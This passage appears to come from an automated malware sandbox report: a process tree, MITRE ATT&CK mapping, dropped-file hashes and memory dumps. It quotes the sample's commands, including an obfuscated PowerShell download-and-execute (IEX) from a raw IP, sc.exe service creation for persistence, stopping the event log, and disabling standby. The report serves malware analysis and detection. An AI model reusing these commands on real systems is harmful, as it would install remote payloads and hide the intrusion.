        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        10⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2160
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        10⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1652
        
        C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:292
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "LIB"
        10⤵
        Launches sc.exe
        
        PID:1568
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
        10⤵
        Launches sc.exe
        
        PID:1696
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        10⤵
        Launches sc.exe
        
        PID:2384
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "LIB"
        10⤵
        Launches sc.exe
        
        PID:2736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2100
    - - C:\Windows\system32\ipconfig.exe
        
        "C:\Windows\system32\ipconfig.exe" /flushdns
        5⤵
        Gathers network information
        
        PID:2960

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "21354429951957220804-4240506541319540706480783522-362915344311064438-1393094908"
1⤵
PID:1500

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "725494791-940305741579456579-1100423391-71079688-195467236418810083111309611015"
1⤵
PID:1596

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-14665177881544605955-1794499894-19370514161676829261890491756556486570626247102"
1⤵
PID:1640

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "209020220-788319181-10291888471905679389-209344115720245218982020166681-482118747"
1⤵
PID:884

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1399427581358054530-1839017621-1133215727-886420168-985091929-1932248378-1562600042"
1⤵
PID:2556

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "112673178628996705419856073961404131065-478953759-41541917335974222811080115"
1⤵
PID:2648

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1435518792118120839416341756121244282606270785743890454952360515305-754403420"
1⤵
PID:1616

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1145950790296096820-2049568381621528457-1978877765-79724755-1243444827844115674"
1⤵
PID:2032

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-399737336696011868-1860756010-1137470012744109420-13640532281985751226-625436427"
1⤵
PID:1788

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "640259872-895831503-17031875281056267926-4434919591516829414-1524736864-2046581392"
1⤵
PID:1312

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16259500111348167387-317032975355033327-1739866535-1841407083940828325-27698780"
1⤵
PID:1964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tempScript.js

Filesize
2KB

MD5
82f229d0c36b68073da70ef5958e425d

SHA1
2beb8cd227b49b1d119165d6e3d258ddb730387a

SHA256
0f2579fdb9cbaaec15015df17dbaafd73a9d7d3202321aba6a1c8479cac17394

SHA512
4553f11b61e2c1cb1ebf532e7417380a8a5c19121331b76894bf5d3605a905fa3f62b54d596a818709f28c49fd7eb1d880798907a84cac45ccff65ee93f9e970

Download Submit
C:\Users\Admin\AppData\Roaming\CMD.vbs

Filesize
27KB

MD5
238ec4d17050e1841e8e0171407c2260

SHA1
2c8c14b257641f1e1151c6303dabde01621314f2

SHA256
163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb

SHA512
3eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
af9f138d48d78892562d11c2e78169e9

SHA1
d2b3ae6fe25e7da1d08d9832c71eeeba66e33a29

SHA256
34046b64d27ace08dda8897bc3fd4d96fb34e323fef0bdfc593085ea114fbdfa

SHA512
1a78647f596b5c2fac4cb879f6fd5a4e1f14012a82ac40126b0190207bea18d3e141cad27de9f8e5731c0f16ee79baa41999f5386396c2094b3645f457c8bb28

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d8281e3cd58300249fcef2178f91ecbd

SHA1
5993c0d5a2852f3de38dae960438820d5023fb98

SHA256
24bf28faecfab779b6275744942a9093cd38b20b366976bab912fa28cd268755

SHA512
c8d40c3fe4059943be97e72fe0e1421f68184849074a7b7946ec948c84646c783abc829d70584d3c038548b2912c0362ee02e143b708bb85e3c28901cb765bdc

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\LB31.exe

Filesize
7.3MB

MD5
c9e6aa21979d5fc710f1f2e8226d9dfe

SHA1
d881f97a1fe03f43bed2a9609eae65531cf710cf

SHA256
a1a8cfcc74f8f96fd09115189defe07ac6fc2e85a9ff3b3ec9c6f454aede1c1d

SHA512
9e90bcb64b0e1f03e05990cdead076b4c6e0b050932ecb953dae50b7e92b823a80fc66d1fd8753591719e89b405757b2bf7518814bc6a19bb745124d1a691627

Download Submit
memory/280-397-0x000000013F820000-0x000000014031F000-memory.dmp

Filesize
11.0MB

Download
memory/280-344-0x000000013F820000-0x000000014031F000-memory.dmp

Filesize
11.0MB

Download
memory/292-54-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/292-52-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/292-55-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/292-57-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/292-59-0x0000000076C00000-0x0000000076D1F000-memory.dmp

Filesize
1.1MB

Download
memory/292-53-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/292-58-0x0000000076E20000-0x0000000076FC9000-memory.dmp

Filesize
1.7MB

Download
memory/292-60-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/348-31-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/348-43-0x000000013FE70000-0x000000014096F000-memory.dmp

Filesize
11.0MB

Download
memory/348-30-0x000000001B8E0000-0x000000001BBC2000-memory.dmp

Filesize
2.9MB

Download
memory/432-63-0x0000000000C90000-0x0000000000CB4000-memory.dmp

Filesize
144KB

Download
memory/432-67-0x000007FEBEBB0000-0x000007FEBEBC0000-memory.dmp

Filesize
64KB

Download
memory/432-66-0x0000000000CC0000-0x0000000000CEB000-memory.dmp

Filesize
172KB

Download
memory/432-65-0x0000000000C90000-0x0000000000CB4000-memory.dmp

Filesize
144KB

Download
memory/432-68-0x0000000036E60000-0x0000000036E70000-memory.dmp

Filesize
64KB

Download
memory/476-109-0x0000000000150000-0x000000000017B000-memory.dmp

Filesize
172KB

Download
memory/476-111-0x0000000036E60000-0x0000000036E70000-memory.dmp

Filesize
64KB

Download
memory/476-110-0x000007FEBEBB0000-0x000007FEBEBC0000-memory.dmp

Filesize
64KB

Download
memory/476-343-0x000000013F820000-0x000000014031F000-memory.dmp

Filesize
11.0MB

Download
memory/476-558-0x000000013F820000-0x000000014031F000-memory.dmp

Filesize
11.0MB

Download
memory/500-105-0x0000000000300000-0x000000000032B000-memory.dmp

Filesize
172KB

Download
memory/500-113-0x000007FEBEBB0000-0x000007FEBEBC0000-memory.dmp

Filesize
64KB

Download
memory/500-114-0x0000000036E60000-0x0000000036E70000-memory.dmp

Filesize
64KB

Download
memory/592-107-0x0000000036E60000-0x0000000036E70000-memory.dmp

Filesize
64KB

Download
memory/592-100-0x0000000000180000-0x00000000001AB000-memory.dmp

Filesize
172KB

Download
memory/592-106-0x000007FEBEBB0000-0x000007FEBEBC0000-memory.dmp

Filesize
64KB

Download
memory/752-102-0x000007FEBEBB0000-0x000007FEBEBC0000-memory.dmp

Filesize
64KB

Download
memory/752-103-0x0000000036E60000-0x0000000036E70000-memory.dmp

Filesize
64KB

Download
memory/752-101-0x0000000000F30000-0x0000000000F5B000-memory.dmp

Filesize
172KB

Download
memory/1616-326-0x00000000FF9D0000-0x00000000FFA27000-memory.dmp

Filesize
348KB

Download
memory/1916-45-0x000000013FE70000-0x000000014096F000-memory.dmp

Filesize
11.0MB

Download
memory/1916-304-0x000000013FE70000-0x000000014096F000-memory.dmp

Filesize
11.0MB

Download
memory/2100-22-0x000000001BC70000-0x000000001BC8A000-memory.dmp

Filesize
104KB

Download
memory/2420-10-0x000007FEF51C0000-0x000007FEF5BAC000-memory.dmp

Filesize
9.9MB

Download
memory/2420-5-0x000007FEF51C0000-0x000007FEF5BAC000-memory.dmp

Filesize
9.9MB

Download
memory/2420-2-0x00000000001E0000-0x00000000001E6000-memory.dmp

Filesize
24KB

Download
memory/2420-1-0x0000000000140000-0x0000000000152000-memory.dmp

Filesize
72KB

Download
memory/2420-0-0x000007FEF51C3000-0x000007FEF51C4000-memory.dmp

Filesize
4KB

Download
memory/2472-12-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/2472-13-0x0000000001F60000-0x0000000001F68000-memory.dmp

Filesize
32KB

Download